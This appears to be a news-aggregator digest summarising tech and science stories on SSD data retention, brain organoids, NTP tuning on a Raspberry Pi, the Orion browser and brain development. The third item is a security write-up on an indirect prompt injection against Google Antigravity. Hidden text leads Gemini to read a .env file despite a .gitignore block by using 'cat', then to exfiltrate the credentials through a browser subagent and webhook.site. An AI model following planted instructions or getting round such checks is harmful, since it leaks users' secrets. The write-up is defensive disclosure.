10 interesting stories served every morning and every evening.




1 688 shares, 30 trendiness

The unpowered SSDs in your drawer are slowly losing your data

After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).

SSDs have all but replaced hard drives as primary storage. They’re orders of magnitude faster and more convenient than mechanical hard drives, and they consume less power. That said, if you’re also using SSDs for cold storage, expecting the drives lying in your drawer to work perfectly after years, you might want to rethink your strategy. Your reliable SSD could suffer from corrupted or lost data if left unpowered for extended periods. This is why many users don’t consider SSDs a reliable long-term storage medium, and prefer using hard drives, magnetic tape, or M-Disc instead.

Your SSD data isn’t as permanent as you think

Unlike hard drives that magnetize spinning discs to store data, SSDs modify the electrical charge in NAND flash cells to represent 0 and 1. NAND flash retains data in underlying transistors even when power is removed, similar to other forms of non-volatile memory. However, the duration for which your SSD can retain data without power is the key here. Even the cheapest SSDs, say those with QLC NAND, can safely store data for about a year of being completely unpowered. More expensive TLC NAND can retain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of unpowered storage, respectively.
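
Those figures suggest a simple rule of thumb. Here is a minimal sketch (mine, not from the article; the retention windows are the article’s rough numbers) that flags an archived drive once it has sat unpowered past the conservative window for its NAND type:

from datetime import date, timedelta

# Rough unpowered-retention windows from the article (in years).
RETENTION_YEARS = {"QLC": 1, "TLC": 3, "MLC": 5, "SLC": 10}

def needs_refresh(nand_type: str, last_powered: date) -> bool:
    """True if the drive has sat unpowered longer than its retention window."""
    window = timedelta(days=365 * RETENTION_YEARS[nand_type])
    return date.today() - last_powered > window

# Example: a QLC drive last plugged in two years ago is overdue for a refresh.
print(needs_refresh("QLC", date(2023, 11, 1)))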

The problem is that most consumer SSDs use only TLC or QLC NAND, so users who leave their SSDs unpowered for over a year are risking the integrity of their data. The reliability of QLC NAND has improved over the years, so you should probably treat 2–3 years of unpowered storage as the guardrail. Without power, the charge stored in the NAND cells can leak away, resulting in missing data or a completely unusable drive.

This data-retention deficiency makes consumer SSDs an unreliable medium for long-term data storage, especially for creative professionals and researchers. HDDs can suffer from bit rot, too, due to wear and tear, but they’re still more resistant to power loss. If you haven’t checked your archives in a while, I’d recommend doing so at the earliest opportunity.

But most people don’t need to worry about it

The scenario I described above isn’t relevant to people outside enterprise, enthusiast, and solopreneur usage. Most people use one or two SSDs in their PC that might be left without power for a few months at most, so storing tons of data for years on unplugged drives isn’t a concern for them. If you’ve lost data on your SSD, it was probably due to a rare power surge or a faulty drive rather than voltage loss. That said, some factors, like temperature and the quality of the underlying NAND flash, can accelerate this voltage loss.

SSDs aren’t eternal, even if you keep them powered on forever. The limited write cycles of NAND flash will eventually bring an SSD to the end of its lifecycle, but the majority of users will probably replace the drive before that ever happens. So, you don’t need to worry about writing too much data to your SSD or leaving your PC turned off for days, weeks, or even months. Just don’t trust an unpowered SSD that’s gathering dust in the house for years, which brings me to my next point.
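
To put the write-cycle point in perspective with illustrative numbers (mine, not the article’s): a 1 TB TLC drive rated for 600 TBW (terabytes written) could absorb roughly 50 GB of writes every day for about 33 years (600,000 GB / 50 GB per day = 12,000 days) before reaching its rated endurance, far longer than a typical upgrade cycle.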

You should always have a backup anyway

Prevention is better than cure

Backing up your data is the simplest strategy to counteract the limitations of storage media. Having multiple copies of your data on different types of storage ensures that no unexpected incident can make it vanish forever. This is exactly what the 3-2-1 backup rule describes: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.

Whether it’s the limited lifespan of your SSD, the potential for harmful exigencies like power failure, or the limits of data retention on flash storage, your backup will ensure your peace of mind. Yes, SSDs aren’t the best choice for cold storage, but even if you’re using hard drives, having a single copy of your data is asking for trouble. Every user will come face-to-face with drive failure sooner or later, so investing in a robust backup system isn’t really optional if you care about your data.

“Store it and forget it” doesn’t work for SSDs

As long as you’re using consumer SSDs for primary storage on your PC, it’s all well and good; you’ll most likely replace your drive long before exhausting its P/E cycles. For long-term storage, however, relying on SSDs is risky, since they can lose data if left without power for years. This data loss can occur anytime after 1 to 3 years of keeping your SSDs unpowered, so using alternative storage media and investing in a backup system should be your priorities.

...

Read the original on www.xda-developers.com »

2 380 shares, 27 trendiness

Evidence suggests early developing human brains are preconfigured with instructions for understanding the world

Humans have long wondered when and how we begin to form thoughts. Are we born with a pre-configured brain, or do thought patterns only begin to emerge in response to our sensory experiences of the world around us? Now, science is getting closer to answering the questions philosophers have pondered for centuries.

Researchers at the University of California, Santa Cruz, are using tiny models of human brain tissue, called organoids, to study the earliest moments of electrical activity in the brain. A new study in Nature Neuroscience finds that the earliest firings of the brain occur in structured patterns without any external experiences, suggesting that the human brain is preconfigured with instructions about how to navigate and interact with the world.

“These cells are clearly interacting with each other and forming circuits that self-assemble before we can experience anything from the outside world,” said Tal Sharf, assistant professor of biomolecular engineering at the Baskin School of Engineering and the study’s senior author. “There’s an operating system that exists, that emerges in a primordial state. In my laboratory, we grow brain organoids to peer into this primordial version of the brain’s operating system and study how the brain builds itself before it’s shaped by sensory experience.”

By improving our fundamental understanding of human brain development, these findings can help researchers better understand neurodevelopmental disorders and pinpoint the impact of toxins like pesticides and microplastics on the developing brain.

The brain, similar to a computer, runs on electrical signals—the firing of neurons. When these signals begin to fire, and how the human brain develops, are challenging topics for scientists to study, as the early developing human brain is protected within the womb.

Organoids, which are 3D models of tissue grown from human stem cells in the lab, provide a unique window into brain development. The Braingeneers group at UC Santa Cruz, in collaboration with researchers at UC San Francisco and UC Santa Barbara, is pioneering methods to grow these models and take measurements from them to gain insights into brain development and disorders.

Organoids are particularly useful for understanding whether the brain develops in response to sensory input—as they exist in the lab setting and not the body—and can be grown ethically in large quantities. In this study, researchers prompted stem cells to form brain tissue, and then measured their electrical activity using specialized microchips, similar to those that run a computer. Sharf’s background in applied physics, computation, and neurobiology forms his expertise in modeling the circuitry of the early brain.

“An organoid system that’s intrinsically decoupled from any sensory input or communication with organs gives you a window into what’s happening with this self-assembly process,” Sharf said. “That self-assembly process is really hard to do with traditional 2D cell culture—you can’t get the cell diversity and the architecture. The cells need to be in intimate contact with each other. We’re trying to control the initial conditions, so we can let biology do its wonderful thing.”

The Sharf lab is developing novel neural interfaces, leveraging expertise in physics, materials science, and electrical engineering. On the right, Koushik Devarajan, an electrical and computer engineering Ph.D. student in the Sharf lab.

The researchers observed the electrical activity of the brain tissue as it self-assembled from stem cells into a tissue that can translate the senses and produce language and conscious thought. They found that within the first few months of development, long before the human brain is capable of receiving and processing complex external sensory information such as vision and hearing, its cells spontaneously began to emit electrical signals characteristic of the patterns that underlie translation of the senses.

Through decades of neuroscience research, the community has discovered that neurons fire in patterns that aren’t just random. Instead, the brain has a “default mode” — a basic underlying structure for firing neurons which then becomes more specific as the brain processes unique signals like a smell or taste. This background mode outlines the possible range of sensory responses the body and brain can produce.

In their observations of single-neuron spikes in the self-assembling organoid models, Sharf and colleagues found that these earliest observable patterns bear a striking similarity to the brain’s default mode. Even without having received any sensory input, the neurons fire off a complex repertoire of time-based patterns, or sequences, which have the potential to be refined for specific senses, hinting at a genetically encoded blueprint inherent to the neural architecture of the living brain.

“These intrinsically self-organized systems could serve as a basis for constructing a representation of the world around us,” Sharf said. “The fact that we can see them in these early stages suggests that evolution has figured out a way that the central nervous system can construct a map that would allow us to navigate and interact with the world.”

Knowing that these organoids produce the basic structure of the living brain opens up a range of possibilities for better understanding human neurodevelopment, disease, and the effects of toxins in the brain.

“We’re showing that there is a basis for capturing complex dynamics that likely could be signatures of pathological onsets that we could study in human tissue,” Sharf said. “That would allow us to develop therapies, working with clinicians at the preclinical level to potentially develop compounds, drug therapies, and gene editing tools that could be cheaper, more efficient, higher throughput.”

This study included researchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.

...

Read the original on news.ucsc.edu »

3 305 shares, 134 trendiness

Google Antigravity Exfiltrates Data

An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.

Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.

Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.

Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.

In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.

Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access’ set to Off). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.

The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new Payer AI Agents feature.

Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1-point font.

The injection instructs Gemini to:

a. Collect code snippets and credentials from the user’s codebase.

b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs, and append credentials and code snippets to the request.

c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.

Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.

a. Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a ‘fictitious tool’ to help the user understand the Oracle ERP integration.

b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.

c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.

This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file-reading capability that has been blocked.

d. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL-encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending the result to a webhook.site domain that is monitored by the attacker (see the sketch after the note below).

e. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.

This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.

Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
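
To make step (d) concrete, here is a minimal sketch (mine, not code from the attack) of the shape of such an exfiltration URL; the webhook ID and the stolen contents are made-up placeholders:

from urllib.parse import quote

# Pretend these were read out of the victim's codebase and .env file.
stolen = "AWS_SECRET_ACCESS_KEY=abc123 plus a few code snippets"

# URL-encode the payload and append it to an attacker-watched webhook.site
# address (the UUID here is a placeholder).
url = ("https://webhook.site/00000000-0000-0000-0000-000000000000"
       "?data=" + quote(stolen))

# Any visit to this URL, e.g. by a browser subagent, logs the query string
# for whoever is watching the webhook.
print(url)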

When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.

However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL and monitor the requests made to it.

So, the subagent completes the task.

When the malicious URL is opened by the browser subagent, the credentials and code stored in the URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.

During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.

These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.

This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.

This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.

One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.

However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.

Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.

A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:

Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.

...

Read the original on www.promptarmor.com »

4 267 shares, 16 trendiness

DWARF support for macOS and Linux by joelreymont · Pull Request #14369 · ocaml/ocaml

...

Read the original on github.com »

5 262 shares, 18 trendiness

World's Most Stable Raspberry Pi? 81% Better NTP with Thermal Management

I’ve written before about building microsecond-accurate NTP servers with Raspberry Pi and GPS PPS, and more recently about revisiting the setup in 2025. Both posts focused on the hardware setup and basic configuration to achieve sub-microsecond time synchronization using GPS Pulse Per Second (PPS) signals.

But there was a problem. Despite having a stable PPS reference, my NTP server’s frequency drift was exhibiting significant variation over time. After months (years) of monitoring the system with Grafana dashboards, I noticed something interesting: the frequency oscillations seemed to correlate with CPU temperature changes. The frequency would drift as the CPU heated up during the day and cooled down at night, even though the PPS reference remained rock-solid.

Like clockwork (no pun intended), I somehow get sucked back into trying to improve my setup every 6-8 weeks. This post is the latest on that never-ending quest.

This post details how I achieved an 81% reduction in frequency variability and 77% reduction in frequency standard deviation through a combination of CPU core pinning and thermal stabilization. Welcome to Austin’s Nerdy Things, where we solve problems that 99.999% of people (and 99% of datacenters) don’t have.

Modern CPUs, including those in Raspberry Pis, use dynamic frequency scaling to save power and manage heat. When the CPU is idle, it runs at a lower frequency (and voltage). When load increases, it scales up. This is great for power efficiency, but terrible for precision timekeeping.

Why? Because timekeeping (with NTP/chronyd/others) relies on a stable system clock to discipline itself against reference sources. If the CPU frequency is constantly changing, the system clock’s tick rate varies, introducing jitter into the timing measurements. Even though my PPS signal was providing a mostly perfect 1-pulse-per-second reference, the CPU’s frequency bouncing around made it harder for chronyd to maintain a stable lock.

But here’s the key insight: the system clock is ultimately derived from a crystal oscillator, and crystal oscillator frequency is temperature-dependent. The oscillator sits on the board near the CPU, and as the CPU heats up and cools down throughout the day, so does the crystal. Even a few degrees of temperature change can shift the oscillator’s frequency by parts per million — exactly what I was seeing in my frequency drift graphs. The CPU frequency scaling was one factor, but the underlying problem was that temperature changes were affecting the crystal oscillator itself. By stabilizing the CPU temperature, I could stabilize the thermal environment for the crystal oscillator, keeping its frequency consistent.

Looking at my Grafana dashboard, I could see the frequency offset wandering over a range of about 1 PPM (parts per million) as the Pi warmed up and cooled down throughout the day. The RMS offset was averaging around 86 nanoseconds, which isn’t terrible (it’s actually really, really, really good), but I knew it could be better.
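
For scale (my arithmetic, not from the post): a frequency error of 1 PPM means the clock gains or loses a microsecond every second, or about 86 ms per day if left uncorrected (86,400 s × 10⁻⁶). The residual RMS offset stays in the nanoseconds rather than milliseconds because chronyd continuously measures and steers that drift out against the PPS reference; a steadier oscillator simply gives it less to chase.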

After staring at graphs for longer than I’d like to admit, I had an idea: what if I could keep the CPU at a constant temperature? If the temperature (and therefore the frequency) stayed stable, maybe the timing would stabilize too.

The solution came in two parts:

1. CPU core isolation — Dedicate CPU 0 exclusively to timing-critical tasks (chronyd and PPS interrupts)

2. Thermal stabilization — Keep the other CPUs busy to maintain a constant temperature, preventing frequency scaling

Here’s what happened when I turned on the thermal stabilization system on November 17, 2025 at 09:10 AM:

Same-ish graph, but with CPU temperature also plotted:

That vertical red line on the first plot marks when I activated the “time burner” process. Notice how the frequency oscillations immediately dampen and settle into a much tighter band? Let’s dive into how this works.

EDIT: 2025-11-25 I didn’t expect to wake up and see this at #2 on Hacker News — https://news.ycombinator.com/item?id=46042946

The first step is isolating timing-critical operations onto a dedicated CPU core. On a Raspberry Pi (4-core ARM), this means:

* CPU 0: chronyd and the PPS interrupt handler, and nothing else

* CPUs 1-3: Everything else, including our thermal load

I had AI (probably Claude Sonnet 4 ish, maybe 4.5) create a boot optimization script that runs at system startup:

#!/bin/bash
# PPS NTP Server Performance Optimization Script
# Sets CPU affinity, priorities, and performance governor at boot

set -e

echo "Setting up PPS NTP server performance optimizations..."

# Wait for system to be ready
sleep 5

# Set CPU governor to performance mode
echo "Setting CPU governor to performance..."
cpupower frequency-set -g performance

# Pin PPS interrupt to CPU0 (may fail if already pinned, that's OK)
echo "Configuring PPS interrupt affinity..."
echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo "PPS IRQ already configured"

# Wait for chronyd to start
echo "Waiting for chronyd to start..."
timeout=30
while [ $timeout -gt 0 ]; do
    chronyd_pid=$(pgrep chronyd 2>/dev/null || echo "")
    if [ -n "$chronyd_pid" ]; then
        echo "Found chronyd PID: $chronyd_pid"
        break
    fi
    sleep 1
    ((timeout--))
done

if [ -z "$chronyd_pid" ]; then
    echo "Warning: chronyd not found after 30 seconds"
else
    # Set chronyd to real-time priority and pin to CPU 0
    echo "Setting chronyd to real-time priority and pinning to CPU 0..."
    chrt -f -p 50 $chronyd_pid
    taskset -cp 0 $chronyd_pid
fi

# Boost ksoftirqd/0 priority
echo "Boosting ksoftirqd/0 priority..."
ksoftirqd_pid=$(ps aux | grep '\[ksoftirqd/0\]' | grep -v grep | awk '{print $2}')
if [ -n "$ksoftirqd_pid" ]; then
    renice -n -10 $ksoftirqd_pid
    echo "ksoftirqd/0 priority boosted (PID: $ksoftirqd_pid)"
else
    echo "Warning: ksoftirqd/0 not found"
fi

echo "PPS NTP optimization complete!"

# Log current status
echo "=== Current Status ==="
echo "CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)"
echo "PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo 'not readable')"
if [ -n "$chronyd_pid" ]; then
    echo "chronyd Priority: $(chrt -p $chronyd_pid)"
fi
echo "======================"

What this does:

Performance Governor: Forces all CPUs to run at maximum frequency, disabling frequency scaling

PPS IRQ Affinity: Pins the PPS interrupt to CPU 0 so pulse timestamping always happens on the dedicated core

chronyd Pinning: Gives chronyd real-time (FIFO) priority and pins it to CPU 0

ksoftirqd Priority Boost: Improves priority of the kernel softirq handler on CPU 0

This script can be added to /etc/rc.local or as a systemd service to run at boot.

Setting the performance governor helps, but on a Raspberry Pi, even at max frequency, the CPU temperature will still vary based on ambient conditions and load. Temperature changes affect the CPU’s actual operating frequency due to thermal characteristics of the silicon.

The solution? Keep the CPU at a constant temperature using a PID-controlled thermal load. I call it the “time burner” (inspired by CPU burn-in tools, but with precise temperature control).

As a reminder of what we’re really doing here: we’re maintaining a stable thermal environment for the crystal oscillator. The RPi 3B’s 19.2 MHz oscillator is physically located near the CPU on the Raspberry Pi board, so by actively controlling CPU temperature, we’re indirectly controlling the oscillator’s temperature. Since the oscillator’s frequency is temperature-dependent (this is basic physics of quartz crystals), keeping it at a constant temperature means keeping its frequency stable — which is exactly what we need for precise timekeeping.

1. PID controller calculates how much CPU time to burn to maintain target temperature (I chose 54°C)

2. Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)

3. Each worker alternates between busy-loop (MD5 hashing) and sleeping based on PID output
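
Before the full listing below, here is a minimal sketch (mine, not the post’s code) of what a single worker does with the PID output, assuming a 1-second control period and a duty cycle between 0 and 1:

import hashlib
import time

def burn_cycle(duty: float, period: float = 1.0) -> None:
    """Busy-hash for duty*period seconds, then sleep for the remainder."""
    deadline = time.time() + duty * period
    h = hashlib.md5()
    while time.time() < deadline:
        h.update(b"x")  # pointless work that keeps the core (and crystal) warm
    time.sleep(max(0.0, period - duty * period))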

#!/usr/bin/env python3
import time
import argparse
import multiprocessing
import hashlib
import os
from collections import deque

class PIDController:
    """Simple PID controller with output clamping and anti-windup."""

    def __init__(self, Kp, Ki, Kd, setpoint, output_limits=(0, 1), sample_time=1.0):
        self.Kp = Kp
        self.Ki = Ki
        self.Kd = Kd
        self.setpoint = setpoint
        self.output_limits = output_limits
        self.sample_time = sample_time
        self._last_time = time.time()
        self._last_error = 0.0
        self._integral = 0.0
        self._last_output = 0.0

    def update(self, measurement):

...

Read the original on austinsnerdythings.com »

6 255 shares, 39 trendiness

Orion 1.0 ✴︎ Browse Beyond

After six years of relentless development, Orion for macOS 1.0 is here.

What started as a vision initiated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for macOS officially leaves its beta phase behind and joins our iOS and iPadOS apps as a fully-fledged, production-ready browser.

In doing so, it expands the Kagi ecosystem of privacy-respecting, user-centric products (which we have begun fondly naming the “Kagiverse”) to now include: Search, Assistant, Browser, Translate, and News, with more to come.

We built Orion for people who feel that modern browsing has drifted too far from serving the user. This is our invitation to browse beyond ✴︎ the status quo.

The obvious question is: why the heck do we need a new browser? The world already has Chrome, Safari, Firefox, Edge, and a growing list of “AI browsers.” Why add yet another?

Because something fundamental has been lost.

Your browser is the most intimate tool you have on your computer. It sees everything you read, everything you search, everything you type. Do you want that relationship funded by advertisers, or by you?

With ad-funded browsers and AI overlays, your activity is a gold mine. Every click becomes a way to track, every page another opportunity to profile you a little more deeply. We believe there needs to be a different path: a browser that answers only to its user.

Orion is our attempt at that browser. No trade-offs between features and privacy. It’s fast, customizable, and uncompromising on both fronts.

In a world dominated by Chromium, choosing a rendering engine is an act of resistance.

From day one, we made the deliberate choice to build Orion on WebKit, the open-source engine at the heart of Safari and the broader Apple ecosystem. It gives us:

* A high-performance engine that is deeply optimized for macOS and iOS.

* An alternative to the growing Chromium monoculture.

* A foundation that is not controlled by an advertising giant.

Orion may feel familiar if you’re used to Safari — respecting your muscle memory and the aesthetics of macOS and iOS — but it is an entirely different beast under the hood. We combined native WebKit speed with a completely new approach to extensions, privacy, and customization.

Most people switch browsers for one reason: speed.

Orion is designed to be fast by nature, not just in benchmarks, but in how it feels every day:

* A UI that gets out of your way and gives you more screen real estate for content.

* Zero Telemetry: We don’t collect usage data. No analytics, no identifiers, no tracking.

* No ad or tracking technology baked in: Orion is not funded by ads, so there is no incentive to follow you around the web.

* Built-in protections: Strong content blocking and privacy defaults from the first launch.

We are excited about what AI can do for search, browsing, and productivity. Kagi, the company behind Orion, has been experimenting with AI-powered tools for years while staying true to our AI integration philosophy.

But we are also watching a worrying trend: AI agents are being rushed directly into the browser core, with deep access to everything you do online — and sometimes even to your local machine.

Security researchers have already documented serious issues in early AI browsers and “agentic” browser features:

* Hidden or undocumented APIs that allowed embedded AI components to execute arbitrary local commands on users’ devices.

* Prompt-injection attacks that trick AI agents into ignoring safety rules, visiting malicious sites, or leaking sensitive information beyond what traditional browser sandboxes were designed to protect.

* Broader concerns that some implementations are effectively “lighting everything on fire” by expanding the browser’s attack surface and data flows in ways users don’t fully understand.

* We are not against AI, and we are conscious of its limitations. We already integrate with AI-powered services wherever it makes functional sense and will continue to expand those capabilities.

* We are against rushing insecure, always-on agents into the browser core. Your browser should be a secure gateway, not an unvetted co-pilot wired into everything you do.

* Orion ships with no built-in AI code in its core.

* We focus on providing a clean, predictable environment, especially for enterprises and privacy-conscious professionals.

* Orion is designed to connect seamlessly to the AI tools you choose — soon including Kagi’s intelligent features — while keeping a clear separation between your browser and any external AI agents.

As AI matures and security models improve, we’ll continue to evaluate thoughtful, user-controlled ways to bring AI into your workflow without compromising safety, privacy, or user choice.

We designed Orion to bridge the gap between simplicity and power. Out of the box, it’s a clean, intuitive browser for anyone. Under the hood, it’s a deep toolbox for people who live in their browser all day.

Some of the unique features you’ll find in Orion 1.0:

* Focus Mode: Instantly transform any website into a distraction-free web app. Perfect for documentation, writing, or web apps you run all day.

* Link Preview: Peek at content from any app — email, notes, chat — without fully committing to opening a tab, keeping your workspace tidy.

* Mini Toolbar, Overflow Menu, and Page Tweak: Fine-tune each page’s appearance and controls, so the web adapts to you, not the other way around.

* Profiles as Apps: Isolate your work, personal, and hobby browsing into completely separate profiles, each with its own extensions, cookies, and settings.

For power users, we’ve added granular options throughout the browser. These are there when you want them, and out of your way when you don’t.

Orion 1.0 also reflects six years of feedback from early adopters. Many invisible improvements — tab stability, memory behavior, complex web app compatibility — are a direct result of people pushing Orion hard in their daily workflows and telling us what broke.

With this release, we are introducing our new signature: Browse Beyond ✴︎.

We originally started with the browser name ‘Kagi’. On February 3, 2020, Vlad suggested a shortlist for rebranding: Comet, Core, Blaze, and Orion. We chose Orion not just for the name itself, but because it perfectly captured our drive for exploration and curiosity. It was a natural fit that set the stage for everything that followed.

You’ll see this reflected in our refreshed visual identity:

* A refined logo that now uses the same typeface as Kagi, creating a clear visual bond between our browser and our search engine.

Orion is part of the broader Kagi ecosystem, united by a simple idea: the internet should be built for people, not advertisers or any other third parties.

Orion is built by a team of just six developers.

To put that in perspective:

* That’s roughly 10% of the size of the “small” browser teams at larger companies.

* And a rounding error compared to the teams behind Chrome or Edge.

Yet, the impact is real: over 1 million downloads to date, and a dedicated community of 2480 paid subscribers who make this independence possible.

For the first two years, development was carried out by a single developer. Today, we are a tight-knit group operating close to our users. We listen, debate, and implement fixes proposed directly by our community on OrionFeedback.org.

This is our only source of decision-making, rather than any usage analytics or patterns, because remember, Orion is zero-telemetry!

This small-team approach lets us move quickly, stay focused, and avoid the bloat or hype that often comes with scale.

Orion is free for everyone.

Every user also receives 200 free Kagi searches, with no account or sign-up required. It’s our way of introducing you to fast, ad-free, privacy-respecting search from day one.

But we are also 100% self-funded. We don’t sell your data and we don’t take money from advertisers, which means we rely directly on our users to sustain the project.

There are three ways to contribute to Orion’s future:

* Tip Jar (from the app): A simple way to say “thank you” without any commitment.

Supporters (via subscription or lifetime purchase) unlock a set of Orion+ perks available today, including:

* Floating windows: Keep a video or window on top of other apps.

* Early access to new, supporter-exclusive features we’re already building for next year.

By supporting Orion, you’re not just funding a browser — you are co-funding a better web with humans at the center.

Orion 1.0 is just the beginning. Our goal is simple: Browse Beyond, everywhere.

* Orion for macOS

Our flagship browser, six years in the making. Built natively for Mac, with performance and detail that only come from living on the platform for a long time. Download it now.

* Orion for iOS and iPadOS

Trusted daily by users who want features no other mobile browser offers. Native iOS performance with capabilities that redefine what’s possible on mobile. Download it now.

* Orion for Linux (Alpha)

Currently in alpha for users who value choice and independence. Native Linux performance, with the same privacy-first approach as on macOS.

Sign up for our newsletter to follow development and join the early testing wave.

* Orion for Windows (in development)

We have officially started development on Orion for Windows, with a target release scheduled for late 2026. Our goal is full parity with Orion 1.0 for macOS, including synchronized profiles and Orion+ benefits across platforms. Sign up for our newsletter to follow development and join the early testing wave.

Synchronization will work seamlessly across devices, so your browsing experience follows you, not the other way around.

From early testers to privacy advocates and power users, Orion has grown through the voices of its community.

We’ll continue to surface community stories and feedback as Orion evolves. If you share your experience publicly, there’s a good chance we’ll see it.

Hitting v1.0 is a big milestone, but we’re just getting started.

Over the next year, our roadmap is densely packed with:

* Further improvements to stability and complex web app performance.

* New Orion+ features that push what a browser can do while keeping it simple for everyone else.

* Tighter integrations with Kagi’s intelligent tools — always under your control, never forced into your workflow.

We’re also working on expanding and improving our website to better showcase everything Orion can do, including better documentation and onboarding for teams that want to standardize on Orion.

Meanwhile, follow our X account, where we’ll be dropping little freebies on the regular (and don’t worry, we’ll be posting these elsewhere on socials as well!)

Thank you for choosing to Browse Beyond with us.

...

Read the original on blog.kagi.com »

7 240 shares, 37 trendiness

Brain has five ‘eras’, scientists say – with adult mode not starting until early 30s

Scientists have identified five major “epochs” of human brain development in one of the most comprehensive studies to date of how neural wiring changes from infancy to old age.

The study, based on the brain scans of nearly 4,000 people aged from under one year to 90, mapped neural connections and how they evolve during our lives. This revealed five broad phases, split up by four pivotal “turning points” at which brain organisation moves on to a different trajectory, at around the ages of nine, 32, 66 and 83 years.

“Looking back, many of us feel our lives have been characterised by different phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a researcher in neuroinformatics at Cambridge University and senior author of the study.

“Understanding that the brain’s structural journey is not a question of steady progression, but rather one of a few major turning points, will help us identify when and how its wiring is vulnerable to disruption.”

The childhood period of development was found to occur between birth and the age of nine, when it transitions to the adolescent phase — an era that lasts up to the age of 32, on average.

In a person’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, lasting more than three decades. A third turning point around the age of 66 marks the start of an “early ageing” phase of brain architecture. Finally, the “late ageing” brain takes shape at around 83 years old.

The scientists quantified brain organisation using 12 different measures, including the efficiency of the wiring, how compartmentalised it is, and whether the brain relies heavily on central hubs or has a more diffuse connectivity network.

From infancy through childhood, our brains are defined by “network consolidation”, as the wealth of synapses — the connectors between neurons — in a baby’s brain are whittled down, with the more active ones surviving. During this period, the study found, the efficiency of the brain’s wiring decreases.

Meanwhile, grey and white matter grow rapidly in volume, so that cortical thickness — the distance between outer grey matter and inner white matter — reaches a peak, and cortical folding, the characteristic ridges on the outer brain, stabilises.

In the second “epoch” of the brain, the adolescence era, white matter continues to grow in volume, so organisation of the brain’s communications networks is increasingly refined. This era is defined by steadily increasing efficiency of connections across the whole brain, which is related to enhanced cognitive performance. The epochs were defined by the brain remaining on a constant trend of development over a sustained period, rather than staying in a fixed state throughout.

“We’re definitely not saying that people in their late 20s are going to be acting like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the research. “It’s really the pattern of change.”

She added that the findings could give insights into risk factors for mental health disorders, which most frequently emerge during the adolescent period.

At around the age of 32 the strongest overall shift in trajectory is seen. Life events such as parenthood may play a role in some of the changes seen, although the research did not explicitly test this. “We know that women who give birth, their brain changes afterwards,” said Mousley. “It’s reasonable to assume that there could be a relationship between these milestones and what’s happening in the brain.”

